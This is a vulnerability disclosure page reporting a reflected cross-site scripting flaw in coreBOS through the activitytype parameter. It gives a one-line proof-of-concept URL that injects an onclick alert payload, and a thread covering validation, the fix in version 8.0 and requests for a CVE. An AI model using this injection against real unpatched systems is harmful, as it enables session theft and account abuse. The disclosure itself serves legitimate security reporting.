Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Dec 6th 2021


Description

Please enter a description of the vulnerability. coreBOS is vulnerable to Reflected XSS via activitytype in index

Proof of Concept

1.After login, click poc url 2.select Activity Type

// PoC.js
https://demo.corebos.com/index.php?Module_Popup_Edit=1+1&action=EditView&activitytype=123%22%20onclick=alert(1)%20check=%22&dtend=2021-12-06+09%3A30&dtstart=2021-12-06+09%3A30&module=cbCalendar```
# Impact
This vulnerability is capable of...
https://drive.google.com/file/d/1V2dbaOS_h5HCab-C0KUaXOmaurZABVeE/view?usp=sharing

References

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
LoveCpp modified the report
a year ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
Joe Bordes validated this vulnerability a year ago
LoveCpp has been awarded the disclosure bounty
The fix bounty is now up for grabs
LoveCpp
a year ago

Researcher


can you help me request cve?

Joe Bordes marked this as fixed in 8.0 with commit 66bcbd a year ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
LoveCpp
a year ago

Researcher


@admin now can you assign CVE?

Jamie Slome
a year ago

Admin


Hello 👋 @lovecppp

When our system doesn't automatically assign CVEs for reports, we must first ask the maintainer if they are happy for a CVE to be published.

@joebordes - can we go ahead and publish a CVE for this report?

LoveCpp
a year ago

Researcher


@ joebordes hello,can you help me request cve?

to join this conversation